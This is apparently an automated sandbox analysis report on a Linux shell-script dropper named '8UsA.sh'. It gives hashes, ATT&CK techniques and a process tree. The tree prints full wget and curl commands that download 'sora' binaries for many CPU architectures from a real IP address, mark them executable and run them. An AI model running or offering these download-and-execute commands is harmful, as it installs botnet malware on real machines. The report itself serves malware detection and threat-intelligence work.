19c3c3cc30eb913fe9ac16c32d73b328ddbacb45285b5c875ae23c482cd485c4

Analysis

max time kernel
26s
max time network
28s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
27/03/2025, 00:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8UsA.sh
Size

2KB
MD5

c9efcceb02b03898d46050ecf0c1edf8
SHA1

8617de96fe1264b9364df4e65c6ed8ecb1b4b6db
SHA256

19c3c3cc30eb913fe9ac16c32d73b328ddbacb45285b5c875ae23c482cd485c4
SHA512

b64866098a7eb9ac2e64446aa95674f13b8504fd5fdadc088fb1cffac3a3bf9bb863ca273bb86e4afd9caa69a2af4fec90b3cabd8964f88e1b2bb3b2e7aee830

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
728	chmod
738	chmod
743	chmod
781	chmod
803	chmod
813	chmod
823	chmod
748	chmod
761	chmod
818	chmod

Executes dropped EXE 10 IoCs

ioc	pid	Process
/tmp/sora	729	8UsA.sh
/tmp/sora	739	8UsA.sh
/tmp/sora	744	8UsA.sh
/tmp/sora	749	8UsA.sh
/tmp/sora	763	8UsA.sh
/tmp/sora	783	8UsA.sh
/tmp/sora	804	8UsA.sh
/tmp/sora	814	8UsA.sh
/tmp/sora	819	8UsA.sh
/tmp/sora	824	8UsA.sh

Reads runtime system information 10 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
731	wget
735	curl
737	cat
739	sora

Writes file to tmp directory 11 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/sora.sora.arm4	curl
File opened for modification	/tmp/sora.sora.arm5	curl
File opened for modification	/tmp/sora.sora.arm6	curl
File opened for modification	/tmp/sora.sora.arm7	curl
File opened for modification	/tmp/sora.sora.ppc	curl
File opened for modification	/tmp/sora.sora.m68k	curl
File opened for modification	/tmp/sora.sora.sh4	curl
File opened for modification	/tmp/sora.sora.x86	curl
File opened for modification	/tmp/sora	8UsA.sh
File opened for modification	/tmp/sora.sora.mips	curl
File opened for modification	/tmp/sora.sora.mpsl	curl

/tmp/8UsA.sh
/tmp/8UsA.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:703
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.x86
  2⤵
  PID:706
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:721
- /bin/cat
  cat sora.sora.x86
  2⤵
  PID:727
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/sora
  ./sora sora.x86
  2⤵
  PID:729
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:731
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.mips
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:735
- /bin/cat
  cat sora.sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:737
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.mips sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:738
- /tmp/sora
  ./sora sora.mips
  2⤵
  - System Network Configuration Discovery
  PID:739
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.mpsl
  2⤵
  PID:740
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:741
- /bin/cat
  cat sora.sora.mpsl
  2⤵
  PID:742
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.mips sora.sora.mpsl sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:743
- /tmp/sora
  ./sora sora.mpsl
  2⤵
  PID:744
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm4
  2⤵
  PID:745
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:746
- /bin/cat
  cat sora.sora.arm4
  2⤵
  PID:747
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.mips sora.sora.mpsl sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:748
- /tmp/sora
  ./sora sora.arm4
  2⤵
  PID:749
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm5
  2⤵
  PID:750
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/cat
  cat sora.sora.arm5
  2⤵
  PID:760
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.mips sora.sora.mpsl sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:761
- /tmp/sora
  ./sora sora.arm5
  2⤵
  PID:763
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm6
  2⤵
  PID:765
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:772
- /bin/cat
  cat sora.sora.arm6
  2⤵
  PID:780
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.mips sora.sora.mpsl sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:781
- /tmp/sora
  ./sora sora.arm6
  2⤵
  PID:783
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.arm7
  2⤵
  PID:784
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:790
- /bin/cat
  cat sora.sora.arm7
  2⤵
  PID:802
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.mips sora.sora.mpsl sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:803
- /tmp/sora
  ./sora sora.arm7
  2⤵
  PID:804
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.ppc
  2⤵
  PID:806
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:811
- /bin/cat
  cat sora.sora.ppc
  2⤵
  PID:812
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/sora
  ./sora sora.ppc
  2⤵
  PID:814
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.m68k
  2⤵
  PID:815
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:816
- /bin/cat
  cat sora.sora.m68k
  2⤵
  PID:817
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.m68k sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/sora
  ./sora sora.m68k
  2⤵
  PID:819
- /usr/bin/wget
  wget http://212.64.199.191/bins/sora.sora.sh4
  2⤵
  PID:820
- /usr/bin/curl
  curl -O http://212.64.199.191/bins/sora.sora.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:821
- /bin/cat
  cat sora.sora.sh4
  2⤵
  PID:822
- /bin/chmod
  chmod +x 8UsA.sh sora sora.sora.arm4 sora.sora.arm5 sora.sora.arm6 sora.sora.arm7 sora.sora.m68k sora.sora.mips sora.sora.mpsl sora.sora.ppc sora.sora.sh4 sora.sora.x86 systemd-private-2d9bc021c12146e5bf7721a3c230b90f-systemd-timedated.service-lFCy9P
  2⤵
  - File and Directory Permissions Modification
  PID:823
- /tmp/sora
  ./sora sora.sh4
  2⤵
  PID:824

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/sora.sora.x86

Filesize
276B

MD5
91887113c379652accbb2e569277ab0e

SHA1
b5dc361165215e8c87697b8effc9a534f401e993

SHA256
9585eb3a06e59e8e9c80827c2891ba2b1ab47ef4c21f3d74524eb9a5003992e6

SHA512
a4a56f6df2260f5f999b44f7bf8b26358f43d2f64e5dba85a511d5fb16658b0589cbca23a4d65ed125243f0a931713ab6e27d203eecb5bb581ce67a4efb4bdd2

Download Submit